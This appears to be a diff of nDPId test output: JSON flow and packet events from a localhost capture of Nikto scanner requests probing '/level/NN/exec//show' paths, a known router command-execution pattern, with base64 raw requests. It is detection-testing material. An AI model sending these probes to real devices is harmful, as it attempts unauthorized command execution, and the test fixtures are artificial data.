-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 